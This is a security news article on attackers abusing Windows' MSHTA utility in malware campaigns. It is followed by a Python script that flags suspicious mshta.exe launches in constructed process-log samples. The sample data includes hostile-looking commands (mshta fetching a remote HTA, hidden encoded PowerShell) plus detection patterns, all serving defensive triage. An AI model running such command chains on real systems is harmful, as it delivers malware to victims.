Internet Explorer May Be Dead, but Its Ghost Still Runs Malware
Why It Matters
The continued exploitation of MSHTA highlights how legacy Windows components can bypass traditional defenses, forcing enterprises to reassess detection strategies for trusted binaries. Ignoring such abuse could leave networks vulnerable to credential theft, ransomware, and persistent backdoors.
Key Takeaways
- MSHTA abused in CountLoader, LummaStealer, Amatera campaigns.
- Attackers use fake CAPTCHAs and SEO‑poisoned sites to deliver payloads.
- .vg and .gl domains mimic legitimate services for C2 hosting.
- PurpleFox leverages MSHTA to download MSI payloads disguised as PNGs.
- Legitimate software updates can also trigger MSHTA, complicating detection.
Pulse Analysis
Legacy Windows utilities like Microsoft HTML Application Host (MSHTA) have long been classified as living‑off‑the‑land binaries, or LOLbins, because they are signed, preinstalled, and capable of executing scripts without raising immediate alarms. Although Internet Explorer reached end‑of‑life in 2022, its supporting components persist to maintain backward compatibility for enterprise workflows. This built‑in trust makes MSHTA an attractive drop point for malicious code, allowing threat actors to run VBScript or JavaScript payloads directly from memory, sidestepping many endpoint protections that focus on unsigned executables.
Recent Bitdefender findings reveal a sophisticated evolution in MSHTA abuse. Attackers deploy CountLoader and Emmenhtal Loader chains that masquerade as legitimate software installers or Discord phishing messages, often embedding malicious commands behind fake CAPTCHA prompts. They also exploit SEO‑poisoned webpages and domains ending in .vg or .gl—such as explorer.vg and ccleaner.gl—to host HTA files that fetch secondary payloads like LummaStealer or Amatera. In the PurpleFox campaign, MSHTA is used to pull MSI files disguised as PNG images, enabling a rootkit‑enabled backdoor capable of persistence, data exfiltration, and DDoS attacks.
For security teams, the resurgence of MSHTA underscores the need to broaden detection beyond traditional malware signatures. Monitoring for anomalous MSHTA executions, especially those launched from uncommon directories or paired with PowerShell obfuscation, can surface hidden attack vectors. Organizations should also enforce strict application allowlists, scrutinize outbound connections to newly registered TLDs, and educate users about the risks of downloading software from unverified sources. As legacy tools continue to be weaponized, proactive threat hunting and behavioral analytics will be essential to mitigate the silent threat posed by Windows’ own utilities.
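The detection heuristics described above (mshta.exe running from an unusual path, fetching remote content, reaching into newly registered TLDs such as .vg and .gl, or chained with encoded PowerShell) can be turned into a small triage routine over process-creation telemetry. The following is an added example written for this page, not code from Bitdefender or from any of the campaigns discussed; it assumes Sysmon Event ID 1 field names (Image, CommandLine, ParentImage, ParentCommandLine) and a constructed set of four events, including a placeholder domain, a placeholder base64 blob, and a TLD watchlist that a real deployment would tune to its own environment. It also separates a benign local HTA launched by a vendor updater from the suspicious cases, which is the distinction the article's last takeaway warns about.

```python
import re
from urllib.parse import urlparse

# Directories from which a legitimate mshta.exe is expected to run (assumption:
# a standard Windows install; adjust for redirected system roots).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# TLD watchlist drawn from the article's observations; extend per environment.
WATCHED_TLDS = {"vg", "gl"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# PowerShell invoked with any spelling of the encoded-command switch.
ENCODED_PS_RE = re.compile(r"(?i)powershell.*?\s-(?:e|ec|enc|encodedcommand)\b")

# Constructed sample events in Sysmon Event ID 1 shape; none come from a real host.
SAMPLE_EVENTS = [
    {   # unrelated process: must be ignored entirely
        "Image": "C:\\Windows\\System32\\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
        "ParentImage": "C:\\Windows\\explorer.exe",
    },
    {   # benign: a vendor updater running its own local HTA from System32
        "Image": "C:\\Windows\\System32\\mshta.exe",
        "CommandLine": '"C:\\Windows\\System32\\mshta.exe" "C:\\Program Files\\VendorApp\\setup.hta"',
        "ParentImage": "C:\\Program Files\\VendorApp\\update.exe",
    },
    {   # suspicious: browser-spawned mshta pulling a remote HTA from a .vg host (placeholder domain)
        "Image": "C:\\Windows\\System32\\mshta.exe",
        "CommandLine": "mshta.exe https://example-placeholder.vg/verify.hta",
        "ParentImage": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
    },
    {   # suspicious: mshta copy in a user-writable Temp dir, launched by encoded PowerShell
        "Image": "C:\\Users\\carol\\AppData\\Local\\Temp\\mshta.exe",
        "CommandLine": '"C:\\Users\\carol\\AppData\\Local\\Temp\\mshta.exe" C:\\Users\\carol\\AppData\\Local\\Temp\\update.hta',
        "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        # UExBQ0VIT0xERVI= is base64 for "PLACEHOLDER"; it is not a real payload
        "ParentCommandLine": "powershell.exe -nop -w hidden -enc UExBQ0VIT0xERVI=",
    },
]


def is_mshta(event):
    """True when the created process image is mshta.exe, regardless of its directory."""
    return event.get("Image", "").lower().rsplit("\\", 1)[-1] == "mshta.exe"


def analyze_event(event):
    """Return a list of (rule_id, detail) findings for one process-creation event."""
    if not is_mshta(event):
        return []
    findings = []
    image = event["Image"].lower()
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    parent_cmd = event.get("ParentCommandLine", "")

    # Rule 1: mshta.exe executing from outside the Windows system directories.
    if not image.startswith(SYSTEM_DIRS):
        findings.append(("mshta_unusual_path", event["Image"]))

    # Rule 2: remote content fetched over HTTP(S); Rule 3: that host sits in a watched TLD.
    for url in URL_RE.findall(cmd):
        findings.append(("mshta_remote_url", url))
        host = urlparse(url).hostname or ""
        if host.rsplit(".", 1)[-1].lower() in WATCHED_TLDS:
            findings.append(("mshta_watched_tld", host))

    # Rule 4: chained with PowerShell; escalate when the PowerShell side is encoded.
    if parent == "powershell.exe" or "powershell" in cmd.lower():
        ps_cmd = parent_cmd if parent == "powershell.exe" else cmd
        rule = "mshta_powershell_encoded" if ENCODED_PS_RE.search(ps_cmd) else "mshta_powershell_chain"
        findings.append((rule, ps_cmd or event["ParentImage"]))

    return findings


def triage(events):
    """Map event index -> findings, keeping only events that raised at least one rule."""
    return {i: f for i, e in enumerate(events) if (f := analyze_event(e))}


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}:")
        for rule, detail in hits:
            print(f"  {rule}: {detail}")
```

Run stand-alone, the script reports nothing for the notepad and vendor-updater events and flags the two suspicious ones. The rules are deliberately independent so that a single hit (a local HTA from System32 with no PowerShell parent) can be routed to a lower severity queue, while events that stack an unusual path with encoded PowerShell, or a remote fetch with a watched TLD, are the ones worth an analyst's immediate attention.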